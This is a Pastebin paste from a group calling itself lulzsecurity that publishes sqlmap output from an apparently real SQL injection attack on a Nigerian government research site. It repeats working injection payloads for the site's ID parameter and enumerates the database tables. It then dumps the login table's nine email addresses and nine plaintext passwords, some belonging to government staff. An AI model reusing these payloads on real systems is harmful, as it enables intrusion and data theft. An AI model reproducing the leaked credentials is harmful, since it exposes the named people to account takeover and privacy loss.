Advertisement
Guest User

Untitled

a guest
Jan 22nd, 2017
302
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.40 KB | None | 0 0
  1. citizens of the interwebz we set sail for fail again
  2. we are lulzsecurity
  3. we just here to drop the juicy dumps
  4.  
  5. shoutz to
  6. Sensei,Lulz Tigre , Shifu, blk ph0x,An0nZOr Uber_r00t,kod3r,molon,yuri,sing sang song
  7. .
  8. base : www.lulzsec.nl
  9. chat : irc.lulzsec.nl:6667
  10. fb : www.facebook.com/lulzsecurity2017.
  11. twitter ; @LulzsecRB
  12.  
  13.  
  14. ---
  15. Parameter: ID (GET)
  16. Type: boolean-based blind
  17. Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  18. Payload: ID=89 RLIKE (SELECT (CASE WHEN (4641=4641) THEN 89 ELSE 0x28 END))
  19.  
  20. Type: error-based
  21. Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  22. Payload: ID=89 OR (SELECT 8507 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(8507=8507,1))),0x71716a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  23.  
  24. Type: AND/OR time-based blind
  25. Title: MySQL >= 5.0.12 OR time-based blind
  26. Payload: ID=89 OR SLEEP(5)
  27. ---
  28. [01:12:39] [INFO] the back-end DBMS is MySQL
  29. web application technology: Apache 2.4.23, PHP 5.5.38
  30. back-end DBMS: MySQL >= 5.0
  31. [01:12:39] [INFO] fetching tables for database: 'nbrrigov_123'
  32. [01:12:39] [INFO] the SQL query used returns 32 entries
  33. Database: nbrrigov_123
  34. [32 tables]
  35. +---------------+
  36. | parameter |
  37. | annce |
  38. | announcementt |
  39. | anny |
  40. | article |
  41. | category |
  42. | comments |
  43. | country |
  44. | doctype |
  45. | document |
  46. | enquiry |
  47. | events |
  48. | eventtype |
  49. | gallery |
  50. | gendata |
  51. | ggcat |
  52. | hardtechn |
  53. | lga |
  54. | link |
  55. | login |
  56. | login_copy |
  57. | mail |
  58. | menu |
  59. | menugroup |
  60. | nbrrireports |
  61. | news |
  62. | page |
  63. | page_copy |
  64. | role |
  65. | states |
  66. | userdata |
  67. | userlogin |
  68. +---------------+
  69.  
  70. [01:12:39] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.nbrri.gov.ng'
  71.  
  72. ---
  73. Parameter: ID (GET)
  74. Type: boolean-based blind
  75. Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  76. Payload: ID=89 RLIKE (SELECT (CASE WHEN (4641=4641) THEN 89 ELSE 0x28 END))
  77.  
  78. Type: error-based
  79. Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  80. Payload: ID=89 OR (SELECT 8507 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(8507=8507,1))),0x71716a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  81.  
  82. Type: AND/OR time-based blind
  83. Title: MySQL >= 5.0.12 OR time-based blind
  84. Payload: ID=89 OR SLEEP(5)
  85. ---
  86. [01:13:03] [INFO] the back-end DBMS is MySQL
  87. web application technology: Apache 2.4.23, PHP 5.5.38
  88. back-end DBMS: MySQL >= 5.0
  89. [01:13:03] [INFO] fetching columns for table 'login_copy' in database 'nbrrigov_123'
  90. [01:13:03] [INFO] the SQL query used returns 7 entries
  91. [01:13:03] [INFO] resumed: ID
  92. [01:13:03] [INFO] resumed: int(18)
  93. [01:13:03] [INFO] resumed: username
  94. [01:13:03] [INFO] resumed: varchar(25)
  95. [01:13:03] [INFO] resumed: password
  96. [01:13:03] [INFO] resumed: varchar(100)
  97. [01:13:03] [INFO] resumed: name
  98. [01:13:03] [INFO] resumed: varchar(35)
  99. [01:13:03] [INFO] resumed: email
  100. [01:13:03] [INFO] resumed: varchar(60)
  101. [01:13:03] [INFO] resumed: level
  102. [01:13:03] [INFO] resumed: varchar(25)
  103. [01:13:03] [INFO] resumed: chk
  104. [01:13:03] [INFO] resumed: varchar(60)
  105. Database: nbrrigov_123
  106. Table: login_copy
  107. [7 columns]
  108. +----------+--------------+
  109. | Column | Type |
  110. +----------+--------------+
  111. | level | varchar(25) |
  112. | chk | varchar(60) |
  113. | email | varchar(60) |
  114. | ID | int(18) |
  115. | name | varchar(35) |
  116. | password | varchar(100) |
  117. | username | varchar(25) |
  118. +----------+--------------+
  119.  
  120. [01:13:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.nbrri.gov.ng'
  121.  
  122. ---
  123. Parameter: ID (GET)
  124. Type: boolean-based blind
  125. Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  126. Payload: ID=89 RLIKE (SELECT (CASE WHEN (4641=4641) THEN 89 ELSE 0x28 END))
  127.  
  128. Type: error-based
  129. Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  130. Payload: ID=89 OR (SELECT 8507 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(8507=8507,1))),0x71716a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  131.  
  132. Type: AND/OR time-based blind
  133. Title: MySQL >= 5.0.12 OR time-based blind
  134. Payload: ID=89 OR SLEEP(5)
  135. ---
  136. [01:13:36] [INFO] the back-end DBMS is MySQL
  137. web application technology: Apache 2.4.23, PHP 5.5.38
  138. back-end DBMS: MySQL >= 5.0
  139. [01:13:36] [INFO] fetching entries of column(s) 'email' for table 'login_copy' in database 'nbrrigov_123'
  140. [01:13:36] [INFO] heuristics detected web page charset 'ascii'
  141. [01:13:37] [INFO] the SQL query used returns 9 entries
  142. [01:13:37] [INFO] retrieved: akabsuc@gmail.com
  143. [01:13:37] [INFO] retrieved: alf@afafag.com
  144. [01:13:37] [INFO] retrieved: clementyari@yahoo.com
  145. [01:13:37] [INFO] retrieved: e_josseph@yahoo.com
  146. [01:13:37] [INFO] retrieved: hrowlands@sec.gov.ng
  147. [01:13:37] [INFO] retrieved: ojo@nsiwc.gov.ng
  148. [01:13:37] [INFO] retrieved: ope@ope.com
  149. [01:13:38] [INFO] retrieved: ponwualu@yahoo.com
  150. [01:13:38] [INFO] retrieved: webprince64@yahoo.com
  151. [01:13:38] [INFO] analyzing table dump for possible password hashes
  152. Database: nbrrigov_123
  153. Table: login_copy
  154. [9 entries]
  155. +-----------------------+
  156. | email |
  157. +-----------------------+
  158. | akabsuc@gmail.com |
  159. | alf@afafag.com |
  160. | clementyari@yahoo.com |
  161. | e_josseph@yahoo.com |
  162. | hrowlands@sec.gov.ng |
  163. | ojo@nsiwc.gov.ng |
  164. | ope@ope.com |
  165. | ponwualu@yahoo.com |
  166. | webprince64@yahoo.com |
  167. +-----------------------+
  168.  
  169. [01:13:38] [INFO] table 'nbrrigov_123.login_copy' dumped to CSV file '/root/.sqlmap/output/www.nbrri.gov.ng/dump/nbrrigov_123/login_copy.csv'
  170. [01:13:38] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.nbrri.gov.ng'
  171.  
  172. [*] shutting down at 01:13:38
  173.  
  174.  
  175. ---
  176. Parameter: ID (GET)
  177. Type: boolean-based blind
  178. Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  179. Payload: ID=89 RLIKE (SELECT (CASE WHEN (4641=4641) THEN 89 ELSE 0x28 END))
  180.  
  181. Type: error-based
  182. Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  183. Payload: ID=89 OR (SELECT 8507 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(8507=8507,1))),0x71716a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  184.  
  185. Type: AND/OR time-based blind
  186. Title: MySQL >= 5.0.12 OR time-based blind
  187. Payload: ID=89 OR SLEEP(5)
  188. ---
  189. [01:14:06] [INFO] the back-end DBMS is MySQL
  190. web application technology: Apache 2.4.23, PHP 5.5.38
  191. back-end DBMS: MySQL >= 5.0
  192. [01:14:06] [INFO] fetching entries of column(s) 'password' for table 'login_copy' in database 'nbrrigov_123'
  193. [01:14:06] [INFO] heuristics detected web page charset 'ascii'
  194. [01:14:06] [INFO] the SQL query used returns 9 entries
  195. [01:14:06] [INFO] retrieved: abuja123
  196. [01:14:06] [INFO] retrieved: ahmed1
  197. [01:14:06] [INFO] retrieved: alfred
  198. [01:14:06] [INFO] retrieved: dayo
  199. [01:14:06] [INFO] retrieved: jabi232#
  200. [01:14:07] [INFO] retrieved: opey
  201. [01:14:07] [INFO] retrieved: password
  202. [01:14:07] [INFO] retrieved: password
  203. [01:14:07] [INFO] retrieved: peteronwualu.net
  204. [01:14:07] [INFO] analyzing table dump for possible password hashes
  205. Database: nbrrigov_123
  206. Table: login_copy
  207. [9 entries]
  208. +------------------+
  209. | password |
  210. +------------------+
  211. | abuja123 |
  212. | ahmed1 |
  213. | alfred |
  214. | dayo |
  215. | jabi232# |
  216. | opey |
  217. | password |
  218. | password |
  219. | peteronwualu.net |
  220. +------------------+
  221.  
  222. [01:14:07] [INFO] table 'nbrrigov_123.login_copy' dumped to CSV file '/root/.sqlmap/output/www.nbrri.gov.ng/dump/nbrrigov_123/login_copy.csv'
  223. [01:14:07] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.nbrri.gov.ng'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement